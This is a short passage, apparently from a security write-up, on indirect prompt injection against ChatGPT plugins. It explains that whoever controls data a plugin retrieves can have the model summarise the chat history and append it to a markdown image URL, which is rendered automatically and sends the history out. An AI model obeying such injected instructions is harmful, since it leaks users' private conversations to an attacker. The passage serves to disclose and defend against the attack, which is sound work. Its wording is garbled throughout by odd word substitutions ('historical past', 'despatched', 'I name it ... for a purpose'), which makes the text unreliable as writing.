This publish shows how a malicious website can take control of a ChatGPT chat session and exfiltrate the historical past of the dialog. With plugins, information exfiltration can happen by sending a lot information into the plugin in the first place. More safety controls and insights on what's being despatched to the plugin are required to empower customers. However, this publish just isn't about sending too much knowledge to a plugin, however about a malicious actor who controls the info a plugin retrieves. The individual controlling the info a plugin retrieves can exfiltrate chat historical past on account of ChatGPT’s rendering of markdown images. ChatGPT will render it routinely and retrieve the URL. During an Indirect Prompt Injection the adversary controls what the LLM is doing (I name it AI Injection for a purpose), and it could possibly ask to summarize the past historical past of the chat and append it to the URL to exfiltrate the info.